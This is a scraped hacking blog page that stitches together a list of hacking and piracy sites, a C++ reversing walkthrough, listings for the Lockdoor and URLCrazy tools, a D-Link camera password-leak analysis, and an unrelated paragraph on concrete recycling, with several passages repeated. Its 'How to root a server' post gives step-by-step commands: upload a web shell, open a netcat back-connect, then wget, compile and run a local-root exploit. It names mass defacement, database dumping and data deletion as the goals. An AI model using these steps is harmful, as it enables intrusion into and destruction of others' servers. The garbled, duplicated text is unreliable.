- Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
- The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
- Black Hat: The Black Hat Briefings have become the biggest and the most important security conference series in the world by sticking to our core value: serving the information security community by delivering timely, actionable security information in a friendly, vendor-neutral environment.
- Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
- Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.
- KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
- Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
- SecurityFocus: Provides security information to all members of the security community, from end users, security hobbyists and network administrators to security consultants, IT Managers, CIOs and CSOs.
- DEFCON: Information about the largest annual hacker convention in the US, including past speeches, video, archives, and updates on the next upcoming show as well as links and other details.
- SecTools.Org: List of 75 security tools based on a 2003 vote by hackers.
- Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.
- Phrack Magazine: Digital hacking magazine.
- HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
- NFOHump: Offers up-to-date .NFO files and reviews on the latest pirate software releases.
Concrete recycling is an increasingly common method of recycling unwanted concrete that normally is trucked to landfills for disposal. The concrete industry culture prevents the process from going full circle. We recycle demolished or renovated concrete structures, utilizing the rubble as the dry aggregate for brand new concrete. Taking the recycling process full cycle drastically lowers costs by allowing flexibility with scheduling, and lowering material cost.
Tuesday, June 30, 2020
Ethical hacking : Top 14 best websites to learn hacking
Friday, June 12, 2020
HOW TO ROOT A SERVER? – SERVER ROOTING
Servers serve the requests made by the users to the web pages, it acts as a helping hand who serves the requested meal for you. Here I am sharing how to root a server. Root is the Administrator of all server. If someone got root access to it, he can do anything with a server like delete and copy anything on the server, can deface all the websites (massive deface ).
We can't talk about root on windows. That enough for a beginner because if I talk about the root I need another book. So, I guess now we know the importance of root access and why we try to get root.
HOW TO ROOT A SERVER?
There are 3 ways to get ROOT on the server :
1 – With local Root.
2 – With SQL by reading the same important files on it root password.
3 – With exploit on software (Buffer Overflow).
1 – With local Root.
2 – With SQL by reading the same important files on it root password.
3 – With exploit on software (Buffer Overflow).
In this post, we will explain local Root. I will explain the other ways soon in some other post.
OK, let's back to work.
OK, let's back to work.
After Uploading your shell on the server and getting the local root you will do a back connect and run the local root to Get root. This is a small idea of how it works in the next step you will see how to
find local root and run it to get root access.
HOW TO SEARCH LOCAL ROOT?
First of all we you need to know what version of Kernel.
You can know that from your shell, for example, this version is 2.6.18 – 2012
Go to EXECUTE on your shell and write "uname -a". You will get the same result, by the way.
Now how to find the local root.
You can use various websites like Exploit-db, packetstormsecurity, vfocus, injector, etc who provides these local roots. One more thing to notice is, that there exist two types of local roots :
1. Local.C: which are not ready.
2. Local: ready to use.
1. Local.C: which are not ready.
2. Local: ready to use.
HOW TO GET ROOT ACCESS?
First, you need a shell with a Back Connect option like this :
Enter your "Public IP Address" in SERVER, the port you want to connect on and leave it, Perl, this time, and Finally connect.
So now you must receive the back connect with a Tool named netcat u can download it from the
net. After that open your terminal if you are under Linux or CMD if you are under Windows. I will explain only Linux, and for Windows, its all the same.
net. After that open your terminal if you are under Linux or CMD if you are under Windows. I will explain only Linux, and for Windows, its all the same.
After that Follow the steps :
1- Press nc -vlp 433
2- Wget [the link of the local-Root.zip]
3 – unzip local-Root.zip
4 – chmod 777 local.c
5 – now to change the local-root from local.c > local
gcc local.c -o local Then you will find local.c transformed to local
6 – chmod 777 local
7 – ./local to local rootwork
8 – su
then see your id uid=0(root) gid=0(root) groups=0(root)
Getting UID=0 means, u had got root privileges and hence can do a variety of stuff on the remote server say Mass deface, dump database, redirect sites, change content, etc etc.
AFTER THE ROOT
As server gets rooted, you're able to do the many things with it like I mentioned above. Such as, withdrawal of domains, massive deface and also deletion of the data completely.
Thursday, June 11, 2020
Reversing Some C++ Io Operations
In general decompilers are not friendly with c++ let's analyse a simple program to get familiar with it.
Let's implement a simple code that loads a file into a vector and then save the vector with following functions:
Lets identify the typical way in C++ to print to stdout with the operator "<<"
The basic_ostream is initialized writing the word "error" to the cout, and then the operator<< again to add the endl.
The Main function simply calls "vec = load(filename)" but the compiler modified it and passed the vector pointer as a parámeter. Then it bulds and prints "loaded " << size << " users".
And finally saves the vector to /tmp/pwd and print "saved".
Most of the mess is basically the operator "<<" to concat and print values.
Also note that the vectors and strings are automatically deallocated when exit the function.
And here is the code:
Let's take a look to the load function, which iterates the ifs.getline() and push to the vector.
First of all there is a mess on the function definition, __return_storage_ptr is the vector.
the ifstream object ifs is initialized as a basic_ifstream and then operator! checks if it wasn't possible to open the file and in that case calls err()
We see the memset and a loop, getline read a cstr like line from the file, and then is converted to a string before pushing it to the vector. lVar1 is the stack canary value.
In this situations dont obfuscate with the vector pointer vec initialization at the begining, in this case the logic is quite clear.
The function save is a bit more tricky, but it's no more than a vector iteration and ofs writing.
Looping a simple "for (auto s : *vec)" in the decompiler is quite dense, but we can see clearly two write, the second write DAT_0010400b is a "\n"
As we see, save implememtation is quite straightforward.
More information
Let's implement a simple code that loads a file into a vector and then save the vector with following functions:
- err
- load
- save
- main
Lets identify the typical way in C++ to print to stdout with the operator "<<"
The basic_ostream is initialized writing the word "error" to the cout, and then the operator<< again to add the endl.
The Main function simply calls "vec = load(filename)" but the compiler modified it and passed the vector pointer as a parámeter. Then it bulds and prints "loaded " << size << " users".
And finally saves the vector to /tmp/pwd and print "saved".
Most of the mess is basically the operator "<<" to concat and print values.
Also note that the vectors and strings are automatically deallocated when exit the function.
And here is the code:
Let's take a look to the load function, which iterates the ifs.getline() and push to the vector.
First of all there is a mess on the function definition, __return_storage_ptr is the vector.
the ifstream object ifs is initialized as a basic_ifstream and then operator! checks if it wasn't possible to open the file and in that case calls err()
We see the memset and a loop, getline read a cstr like line from the file, and then is converted to a string before pushing it to the vector. lVar1 is the stack canary value.
In this situations dont obfuscate with the vector pointer vec initialization at the begining, in this case the logic is quite clear.
The function save is a bit more tricky, but it's no more than a vector iteration and ofs writing.
Looping a simple "for (auto s : *vec)" in the decompiler is quite dense, but we can see clearly two write, the second write DAT_0010400b is a "\n"
As we see, save implememtation is quite straightforward.
More information
Lockdoor-Framework: A PenTesting Framework With Cyber Security Resources
About Lockdoor-Framework
Author: SofianeHamlaoui
- Github: SofianeHamlaoui
- Twitter: S0fianeHamlaoui
- Facebook: S0fianeHamlaoui
LockDoor is a Framework aimed at helping penetration testers, bug bounty hunters And cyber security engineers. This tool is designed for Debian/Ubuntu/ArchLinux based distributions to create a similar and familiar distribution for Penetration Testing. But containing the favorite and the most used tools by Pentesters. As pentesters, most of us has his personal ' /pentest/ ' directory so this Framework is helping you to build a perfect one. With all of that ! It automates the Pentesting process to help you do the job more quickly and easily.
Lockdoor-Framework installation:
For now, Lockdoor-Framework supports Debian-based Linux distros (Kali Linux, ParrotSec, Ubuntu...), Arch Linux based distros (Manjaro, BlackArch, ArchStrike...), Fedora, OpenSuse, Cygwin on Windows.
Open your Terminal and enter these commands:
You can watch detail here:
Lockdoor Tools contents 🛠️:
* Information Gathering 🔎:
- dirsearch: A Web path scanner
- brut3k1t: security-oriented bruteforce framework
- gobuster: DNS and VHost busting tool written in Go
- Enyx: an SNMP IPv6 Enumeration Tool
- Goohak: Launchs Google Hacking Queries Against A Target Domain
- Nasnum: The NAS Enumerator
- Sublist3r: Fast subdomains enumeration tool for penetration testers
- wafw00f: identify and fingerprint Web Application Firewall
- Photon: ncredibly fast crawler designed for OSINT.
- Raccoon: offensive security tool for reconnaissance and vulnerability scanning
- DnsRecon: DNS Enumeration Script
- Nmap: The famous security Scanner, Port Scanner, & Network Exploration Tool
- sherlock: Find usernames across social networks
- snmpwn: An SNMPv3 User Enumerator and Attack tool
- Striker: an offensive information and vulnerability scanner.
- theHarvester: E-mails, subdomains and names Harvester
- URLextractor: Information gathering & website reconnaissance
- denumerator.py: Enumerates list of subdomains
- other: other Information gathering,recon and Enumeration scripts I collected somewhere.
- ReconDog: Reconnaissance Swiss Army Knife
- RED_HAWK: All in one tool for Information Gathering, Vulnerability Scanning and Crawling
- Dracnmap: Info Gathering Framework
* Web Hacking 🌐:
- Spaghetti: Spaghetti - Web Application Security Scanner
- CMSmap: CMS scanner
- BruteXSS: BruteXSS is a tool to find XSS vulnerabilities in web application
- J-dorker: Website List grabber from Bing
- droopescan: scanner, identify, CMSs, Drupal, Silverstripe.
- Optiva: Web Application Scanner
- V3n0M: Pentesting scanner in Python3.6 for SQLi/XSS/LFI/RFI and other Vulns
- AtScan: Advanced dork Search & Mass Exploit Scanner
- WPSeku: Wordpress Security Scanner
- WPScan: A simple Wordpress scanner written in python
- XSStrike: Most advanced XSS scanner.
- SQLMap: automatic SQL injection and database takeover tool
- WhatWeb: the Next generation web scanner
- joomscan: Joomla Vulnerability Scanner Project
- Dzjecter: Server checking Tool
* Privilege Escalation ⚠️:
- Linux 🐧:linux_checksec.sh
linux_enum.sh
linux_gather_files.sh
linux_kernel_exploiter.pl
linux_privesc.py
linux_privesc.sh
linux_security_test
Linux_exploits folder - Windows : windows-privesc-check.py
windows-privesc-check.exe - MySql:raptor_udf.c
raptor_udf2.c
* Reverse Engineering ⚡:
- Radare2: unix-like reverse engineering framework
- VirtusTotal: VirusTotal tools
- Miasm: Reverse engineering framework
- Mirror: reverses the bytes of a file
- DnSpy: .NET debugger and assembly
- AngrIo: A python framework for analyzing binaries (Suggested by @Hamz-a)
- DLLRunner: a smart DLL execution script for malware analysis in sandbox systems.
- Fuzzy Server: a Program That Uses Pre-Made Spike Scripts to Attack VulnServer.
- yara: a tool aimed at helping malware researchers toidentify and classify malware samples
- Spike: a protocol fuzzer creation kit + audits
- other: other scripts collected somewhere
* Exploitation ❗:
- Findsploit: Find exploits in local and online databases instantly
- Pompem: Exploit and Vulnerability Finder
- rfix: Python tool that helps RFI exploitation.
- InUrlBr: Advanced search in search engines
- Burpsuite: Burp Suite for security testing & scanning.
- linux-exploit-suggester2: Next-Generation Linux Kernel Exploit Suggester
- other: other scripts I collected somewhere.
* Shells 🐚:
- WebShells: BlackArch's Webshells Collection
- ShellSum: A defense tool - detect web shells in local directories
- Weevely: Weaponized web shell
- python-pty-shells: Python PTY backdoors
* Password Attacks ✳️:
- crunch : a wordlist generator
- CeWL : a Custom Word List Generator
- patator : a multi-purpose brute-forcer, with a modular design and a flexible usage
- Codetective: a tool to determine the crypto/encoding algorithm used
- findmyhash: Python script to crack hashes using online services
* Social Engineering 🎭:
- scythe: an accounts enumerator
Contributing:
- Fork Lockdoor-Framework:
git clone https://github.com/SofianeHamlaoui/Lockdoor-Framework.git
- Create your feature branch
- Commit your changes
- Push to the branch
- Create a new Pull Request
Features 📙:
what Tools ?: the tools contains Lockdoor are a collection from the best tools (Added value) on Kali Linux, ParrotSec and BlackArch. Also some private tools (Added value) from some other hacking teams (Added value) like InurlBr, iran-cyber. Without forgeting some cool and amazing tools I found on Github made by some perfect human beigns (Added value).
Easy customization: Easily add/remove tools. (Added value)
Installation: You can install the tool automatically using the
Cheatsheets: Everyone can forget something on processing or a tool use, or even some trciks. Here comes the Cheatsheets (Added value) role! there are cheatsheets about everything, every tool on the framework and any enumeration,exploitation and post-exploitation techniques.
Check the Wiki Pages to know more about the tool 📙:
- Pentesting Tools Selection 📙:
what Tools ?: the tools contains Lockdoor are a collection from the best tools (Added value) on Kali Linux, ParrotSec and BlackArch. Also some private tools (Added value) from some other hacking teams (Added value) like InurlBr, iran-cyber. Without forgeting some cool and amazing tools I found on Github made by some perfect human beigns (Added value).
Easy customization: Easily add/remove tools. (Added value)
Installation: You can install the tool automatically using the
install.sh
. Manually or on Docker [COMING SOON]- Resources and cheatsheets 📙 (Added value):
Cheatsheets: Everyone can forget something on processing or a tool use, or even some trciks. Here comes the Cheatsheets (Added value) role! there are cheatsheets about everything, every tool on the framework and any enumeration,exploitation and post-exploitation techniques.
Check the Wiki Pages to know more about the tool 📙:
Lockdoor-Framework's screenshots:
Support the author:
First Step |
Lockdoor update |
ROOT Menu |
Information Gathering |
Web Hacking |
Exploitation |
Reverse Engineering |
Enc/Dec |
Password Attacks |
Shells |
PrivEsc |
Social Engineering |
PSAFRT |
Walkthroughs |
About |
On Paypal: Sofiane Hamlaoui
Related articles
Wednesday, June 10, 2020
URLCrazy - Generate And Test Domain Typos And Variations To Detect And Perform Typo Squatting, URL Hijacking, Phishing, And Corporate Espionage
URLCrazy is an OSINT tool to generate and test domain typos or variations to detect or perform typo squatting, URL hijacking, phishing, and corporate espionage.
Homepage: https://www.morningstarsecurity.com/research/urlcrazy
Use Cases
- Detect typo squatters profiting from typos on your domain name
- Protect your brand by registering popular typos
- Identify typo domain names that will receive traffic intended for another domain
- Conduct phishing attacks during a penetration test
Features
- Generates 15 types of domain variants
- Knows over 8000 common misspellings
- Supports bit flipping attacks
- Multiple keyboard layouts (qwerty, azerty, qwertz, dvorak)
- Checks if a domain variant is valid
- Test if domain variants are in use
- Estimate popularity of a domain variant
Installation
Install from a package manager
If you are using Kali Linux, Ubuntu or Debian use:
$ sudo apt install urlcrazy
Install latest release
Visit https://github.com/urbanadventurer/urlcrazy/releases
Install current development version
Be aware the latest development version may not be stable.
$ git clone https://github.com/urbanadventurer/urlcrazy.git
Install Ruby
URLCrazy has been tested with Ruby versions 2.4 and 2.6.
If you are using Ubuntu or Debian use:
$ sudo apt install ruby
Install Bundler
Bundler provides dependecy management for Ruby projects
$ gem install bundler
Install Dependencies
$ bundle install
Alternatively, if you don't want to install bundler, the following command will install the gem dependencies.
$ gem install json colorize async async-dns async-http
Usage
Simple Usage
With default options, URLCrazy will check over 2000 typo variants for google.com.
$ urlcrazy google.com
With popularity estimate
$ urlcrazy -p domain.com
Commandline Usage
Usage: ./urlcrazy [options] domain
Options
-k, --keyboard=LAYOUT Options are: qwerty, azerty, qwertz, dvorak (default: qwerty)
-p, --popularity Check domain popularity with Google
-r, --no-resolve Do not resolve DNS
-i, --show-invalid Show invalid domain names
-f, --format=TYPE Human readable or CSV (default: human readable)
-o, --output=FILE Output file
-n, --nocolor Disable colour
-h, --help This help
-v, --version Print version information. This version is 0.7
Types of Domain Variations Supported
Character Omission
These typos are created by leaving out a letter of the domain name, one letter at a time. For example, www.goole.com and www.gogle.com
Character Repeat
These typos are created by repeating a letter of the domain name. For example, www.ggoogle.com and www.gooogle.com
Adjacent Character Swap
These typos are created by swapping the order of adjacent letters in the domain name. For example, www.googel.com and www.ogogle.com
Adjacent Character Replacement
These typos are created by replacing each letter of the domain name with letters to the immediate left and right on the keyboard. For example, www.googke.com and www.goohle.com
Double Character Replacement
These typos are created by replacing identical, consecutive letters of the domain name with letters to the immediate left and right on the keyboard. For example, www.gppgle.com and www.giigle.com
Adjacent Character Insertion
These typos are created by inserting letters to the immediate left and right on the keyboard of each letter. For example, www.googhle.com and www.goopgle.com
Missing Dot
These typos are created by omitting a dot from the domainname. For example, wwwgoogle.com and www.googlecom
Strip Dashes
These typos are created by omitting a dash from the domainname. For example, www.domain-name.com becomes www.domainname.com
Singular or Pluralise
These typos are created by making a singular domain plural and vice versa. For example, www.google.com becomes www.googles.com and www.games.co.nz becomes www.game.co.nz
Common Misspellings
Over 8000 common misspellings from Wikipedia. For example, www.youtube.com becomes www.youtub.com and www.abseil.com becomes www.absail.com
Vowel Swapping
Swap vowels within the domain name except for the first letter. For example, www.google.com becomes www.gaagle.com.
Homophones
Over 450 sets of words that sound the same when spoken. For example, www.base.com becomes www.bass.com.
Bit Flipping
Each letter in a domain name is an 8bit character. The character is substituted with the set of valid characters that can be made after a single bit flip. For example, facebook.com becomes bacebook.com, dacebook.com, faaebook.com,fabebook.com,facabook.com, etc.
Homoglyphs
One or more characters that look similar to another character but are different are called homogylphs. An example is that the lower case l looks similar to the numeral one, e.g. l vs 1. For example, google.com becomes goog1e.com.
Wrong Top Level Domain
For example, www.trademe.co.nz becomes www.trademe.co.nz and www.google.com becomes www.google.org Uses the 19 most common top level domains.
Wrong Second Level Domain
Uses an alternate, valid second level domain for the top level domain. For example, www.trademe.co.nz becomes www.trademe.ac.nz and www.trademe.iwi.nz
Supported Keyboard Layouts
Keyboard layouts supported are:
- QWERTY
- AZERTY
- QWERTZ
- DVORAK
Is the domain valid?
URLCrazy has a database of valid top level and second level domains. This information has been compiled from Wikipedia and domain registrars. We know whether a domain is valid by checking if it matches top level and second level domains. For example, www.trademe.co.bz is a valid domain in Belize which allows any second level domain registrations but www.trademe.xo.nz isn't because xo.nz isn't an allowed second level domain in New Zealand.
Popularity Estimate
URLCrazy pioneered the technique of estimating the relative popularity of a typo from search engine results data. By measuring how many times a typo appears in webpages, we can estimate how popular that typo will be made when users type in a URL.
The inherent limitation of this technique, is that a typo for one domain, can be a legitimate domain in its own right. For example, googles.com is a typo of google.com but it also a legitimate domain.
For example, consider the following typos for google.com.
Count. | Typo |
---|---|
25424 | gogle.com |
24031 | googel.com |
22490 | gooogle.com |
19172 | googles.com |
19148 | goole.com |
18855 | googl.com |
17842 | ggoogle.com |
Known Issues
Macos File Descriptor Limit
If DNS resolution fails under Macos it could be due to the small default file descriptor limit.
To display the current file descriptor limit use:
$ ulimit -a
To increase the file descriptor limit use:
$ ulimit -n 10000
URLCrazy Appearances
Kali Linux
URLCrazy was a default tool in BackTrack 5, and later Kali Linux. https://tools.kali.org/information-gathering/urlcrazy
The Browser Hacker's Handbook
Authored by Wade Alcorn, Christian Frichot, and Michele Orru.
URLCrazy is included in Chapter 2 of this seminal work on the topic.
PTES Technical Guidelines
Penetration Testing Execution Standard (PTES) is a standard designed to provide a common language and scope for performing penetration testing (i.e. Security evaluations). URLCrazy is included in the Tools Required section.
http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines
Network Security Toolkit
Network Security Toolkit is a bootable Linux distribution designed to provide easy access to best-of-breed Open Source Network Security Applications. https://www.networksecuritytoolkit.org/
See Also
URLCrazy was first published in 2009, and for many years was the most advanced opensource tool for studying typosquatting. Since then multiple other tools have been developed by the infosec community.
DNSTwist
DNSTwist is developed by Marcin Ulikowski and first published in 2015. DNSTwist had a significant feature overlap with URLCrazy at the time, and introduced many new features.
Language: Python
https://github.com/elceef/dnstwist
URLInsane
URLInsane was developed by Rangertaha in 2018 and claims to match the features of URLCrazy and DNSTwist.
Language: Go
https://github.com/cybint/urlinsane
DomainFuzz
DomainFuzz was developed by monkeym4sterin 2017. Language: Node.JS
https://github.com/monkeym4ster/DomainFuzz
Authors and Acknowledgement
- Authored by Andrew Horton (urbanadventurer).
- Thanks to Ruby on Rails for Inflector which allows plural and singular permutations.
- Thanks to Wikipedia for the set of common misspellings, homophones, and homoglyphs.
- Thanks to software77.net for their IP to country database
Community
If you have any questions, comments or concerns regarding URLCrazy, please consult the documentation prior to contacting one of the developers. Your feedback is always welcome.
via KitPloit
This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com
Related articles
Open Sesame (Dlink - CVE-2012-4046)
A couple weeks ago a vulnerability was posted for the dlink DCS-9xx series of cameras. The author of the disclosure found that the setup application that comes with the camera is able to send a specifically crafted request to a camera on the same network and receive its password in plaintext. I figured this was a good chance to do some analysis and figure out exactly how the application carried out this functionality and possibly create a script to pull the password out of a camera.
The basic functionality of the application is as follows:
After spending some time with the application in a debugger I found what looked like it was responsible for the decoding of the encoded values that are passed:
After spending some time documenting the functionality I came up with the following notes (messy wall of text):
Related links
The basic functionality of the application is as follows:
- Application sends out a UDP broadcast on port 5978
- Camera sees the broadcast on port 5978 and inspects the payload – if it sees that the initial part of the payload contains "FF FF FF FF FF FF" it responds (UDP broadcast port 5978) with an encoded payload with its own MAC address
- Application retrieves the camera's response and creates another UDP broadcast but this time it sets the payload to contain the target camera's MAC address, this encoded value contains the command to send over the password
- Camera sees the broadcast on port 5978 and checks that it is meant for it by inspecting the MAC address that has been specified in the payload, it responds with an encoded payload that contains its password (base64 encoded)
After spending some time with the application in a debugger I found what looked like it was responsible for the decoding of the encoded values that are passed:
super exciting screen shot. |
Command | Comments | |
.JGE SHORT 0A729D36 | ; stage1 | |
./MOV EDX,DWORD PTR SS:[LOCAL.2] | ; set EDX to our 1st stage half decoded buffer | |
.|MOV ECX,DWORD PTR SS:[LOCAL.4] | ; set ECX to our current count/offset | |
.|MOV EAX,DWORD PTR SS:[LOCAL.3] | ; set EAX to our base64 encoded payload | |
.|MOVSX EAX,BYTE PTR DS:[EAX] | ; set EAX to the current value in our base64 payload | |
.|MOV AL,BYTE PTR DS:[EAX+0A841934] | ; set EAX/AL to a hardcoded offset of its value table is at 0a841934 | |
.|MOV BYTE PTR DS:[ECX+EDX],AL | ; ECX = Offset, EDX = start of our half-decoded buffer, write our current byte there | |
.|INC DWORD PTR SS:[LOCAL.4] | ; increment our offset/count | |
.|INC DWORD PTR SS:[LOCAL.3] | ; increment our base64 buffer to next value | |
.|MOV EDX,DWORD PTR SS:[LOCAL.4] | ; set EDX to our counter | |
.|CMP EDX,DWORD PTR SS:[ARG.2] | ; compare EDX (counter) to our total size | |
.\JL SHORT 0A729D13 | ; jump back if we have not finished half decoding our input value | |
.MOV ECX,DWORD PTR SS:[ARG.3] | ; Looks like this will point at our decoded buffer | |
.MOV DWORD PTR SS:[LOCAL.5],ECX | ; set Arg5 to our decoded destination | |
.MOV EAX,DWORD PTR SS:[LOCAL.2] | ; set EAX to our half-decoded buffer | |
.MOV DWORD PTR SS:[LOCAL.3],EAX | ; set arg3 to point at our half-decoded buffer | |
.MOV EDX,DWORD PTR SS:[ARG.4] | ; ???? 1500 decimal | |
.XOR ECX,ECX | ; clear ECX | |
.MOV DWORD PTR DS:[EDX],ECX | ; clear out arg4 value | |
.XOR EAX,EAX | ; clear out EAX | |
.MOV DWORD PTR SS:[LOCAL.6],EAX | ; clear out local.6 | |
.JMP SHORT 0A729DAE | ; JUMP | |
./MOV EDX,DWORD PTR SS:[LOCAL.3] | ; move our current half-decoded dword position into EDX | |
.|MOV CL,BYTE PTR DS:[EDX] | ; move our current byte into ECX (CL) (dword[0]) | |
.|SHL ECX,2 | ; shift left 2 dword[0] | |
.|MOV EAX,DWORD PTR SS:[LOCAL.3] | ; move our current dword position into EAX | |
.|MOVSX EDX,BYTE PTR DS:[EAX+1] | ; move our current dword position + 1 (dword[1]) into EDX | |
.|SAR EDX,4 | ; shift right 4 dword[1] | |
.|ADD CL,DL | ; add (shift left 2 dword[0]) + (shift right 4 dword[1]) | |
.|MOV EAX,DWORD PTR SS:[LOCAL.5] | ; set EAX to our current decoded buffer position | |
.|MOV BYTE PTR DS:[EAX],CL | ; write our decoded (dword[0]) value to or decoded buffer | |
.|INC DWORD PTR SS:[LOCAL.5] | ; increment our position in the decoded buffer | |
.|MOV EDX,DWORD PTR SS:[LOCAL.3] | ; set EDX to our current dword position | |
.|MOV CL,BYTE PTR DS:[EDX+1] | ; set ECX to dword[1] | |
.|SHL ECX,4 | ; left shift 4 dword[1] | |
.|MOV EAX,DWORD PTR SS:[LOCAL.3] | ; set EAX to our current dword position | |
.|MOVSX EDX,BYTE PTR DS:[EAX+2] | ; set EDX to dword[2] | |
.|SAR EDX,2 | ; shift right 2 dword[2] | |
.|ADD CL,DL | ; add (left shift 4 dword[1]) + (right shift 2 dword[2]) | |
.|MOV EAX,DWORD PTR SS:[LOCAL.5] | ; set EAX to our next spot in the decoded buffer | |
.|MOV BYTE PTR DS:[EAX],CL | ; write our decoded value into our decoded buffer | |
.|INC DWORD PTR SS:[LOCAL.5] | ; move to the next spot in our decoded buffer | |
.|MOV EDX,DWORD PTR SS:[LOCAL.3] | ; set EDX to our current half-decoded dword | |
.|MOV CL,BYTE PTR DS:[EDX+2] | ; set ECX dword[2] | |
.|SHL ECX,6 | ; shift left 6 dword[2] | |
.|MOV EAX,DWORD PTR SS:[LOCAL.3] | ; set EAX to our current half-decoded dword | |
.|ADD CL,BYTE PTR DS:[EAX+3] | ; add dword[2] + dword[3] | |
.|MOV EDX,DWORD PTR SS:[LOCAL.5] | ; set EDX to point at our next spot in our decoded buffer | |
.|MOV BYTE PTR DS:[EDX],CL | ; write our decoded byte to our decoded buffer | |
.|INC DWORD PTR SS:[LOCAL.5] | ; move to the next spot in our decoded buffer | |
.|ADD DWORD PTR SS:[LOCAL.3],4 | ; increment our encoded buffer to point at our next dword | |
.|MOV ECX,DWORD PTR SS:[ARG.4] | ; set ECX to our current offset? | |
.|ADD DWORD PTR DS:[ECX],3 | ; add 3 to our current offset? | |
.|ADD DWORD PTR SS:[LOCAL.6],4 | ; add 4 to our byte counter?? | |
.|MOV EAX,DWORD PTR SS:[ARG.2] | ; move total size into EAX | |
.|ADD EAX,-4 | ; subtract 4 from total size | |
.|CMP EAX,DWORD PTR SS:[LOCAL.6] | ; compare our total bytes to read bytes | |
.\JG SHORT 0A729D50 | ; jump back if we are not done | |
.MOV EDX,DWORD PTR SS:[LOCAL.3] | ; set EDX to our last DWORD of encoded buffer | |
.MOVSX ECX,BYTE PTR DS:[EDX+3] | ; set ECX to dword[3] last byte of our half-decoded dword (dword + 3) | |
.INC ECX | ; increment the value of dword[3] | |
.JE SHORT 0A729E1E | ||
.MOV EAX,DWORD PTR SS:[LOCAL.3] | ; set EAX to our current half-decoded dword | |
.MOV DL,BYTE PTR DS:[EAX] | ; set EDX (DL) to dword[0] | |
.SHL EDX,2 | ; shift left 2 dword[0] | |
.MOV ECX,DWORD PTR SS:[LOCAL.3] | ; set ECX to our current encoded dword position | |
.MOVSX EAX,BYTE PTR DS:[ECX+1] | ; set EAX to dword[1] | |
.SAR EAX,4 | ; shift right 4 dword[1] | |
.ADD DL,AL | ; add (shifted left 2 dword[0]) + (shifted right 4 dword[1]) | |
.MOV ECX,DWORD PTR SS:[LOCAL.5] | ; set ECX to point at our next spot in our decoded buffer | |
.MOV BYTE PTR DS:[ECX],DL | ; write our decoded value (EDX/DL) to our decoded buffer | |
.INC DWORD PTR SS:[LOCAL.5] | ; move to the next spot in our decoded buffer | |
.MOV EDX,DWORD PTR SS:[LOCAL.3] | ; set EDX to point at our dword | |
.MOV AL,BYTE PTR DS:[EDX+1] | ; set EAX/AL to dword[1] | |
.SHL EAX,4 | ; shift left 4 dword[1] | |
.MOV EDX,DWORD PTR SS:[LOCAL.3] | ; set EDX to our current dword | |
.MOVSX ECX,BYTE PTR DS:[EDX+2] | ; set ECX to dword[2] | |
.SAR ECX,2 | ; shift right 2 dword[2] | |
.ADD AL,CL | ; add (shifted left 4 dword[1]) + (shifted right 2 dword[2]) | |
.MOV EDX,DWORD PTR SS:[LOCAL.5] | ; set EDX to point at our current spot in our decoded buffer | |
.MOV BYTE PTR DS:[EDX],AL | ; write our decoded value to the decoded buffer | |
.INC DWORD PTR SS:[LOCAL.5] | ; move to the next spot in our decoded buffer | |
.MOV EAX,DWORD PTR SS:[LOCAL.3] | ; set EAX to point at our current dword | |
.MOV CL,BYTE PTR DS:[EAX+2] | ; set ECX/CL to dword[2] | |
.SHL ECX,6 | ; shift left 6 dword[2] | |
.MOV EAX,DWORD PTR SS:[LOCAL.3] | ; point EAX at our current dword | |
.ADD CL,BYTE PTR DS:[EAX+3] | ; add dword[3] + (shifted left 6 dword[2]) | |
.MOV EDX,DWORD PTR SS:[LOCAL.5] | ; point EDX at our current decoded buffer | |
.MOV BYTE PTR DS:[EDX],CL | ; write our decoded value to the decoded buffer | |
.INC DWORD PTR SS:[LOCAL.5] | ; increment our deocded buffer | |
.MOV ECX,DWORD PTR SS:[ARG.4] | ; set ECX to our current offset? | |
.ADD DWORD PTR DS:[ECX],3 | ; add 4 for our current byte counter? | |
.JMP 0A729EA6 | ; jump |
Translated into english: the application first uses a lookup table to translate every byte in the input string, to do this it uses the value of the current byte as an offset into the table. After it is done with "stage1" it traverses the translated input buffer a dword at a time and does some bit shifting and addition to fully decode the value. The following roughly shows the "stage2" routine:
(Dword[0] << 2) + (Dword[1] >> 4) = unencoded byte 1
(Dword[1] << 4) + (Dword[2] >> 2) = unencoded byte 2
(Dword[2] << 6) + Dword[3] = unencoded byte 3
I then confirmed that this routine worked on an "encoded" value that went over the wire from the application to the camera. After confirming the encoding scheme worked, I recreated the network transaction the application does with the camera to create a stand alone script that will retrieve the password from a camera that is on the same lan as the "attacker". The script can be found here, thanks to Jason Doyle for the original finding (@jasond0yle ).
Subscribe to:
Posts (Atom)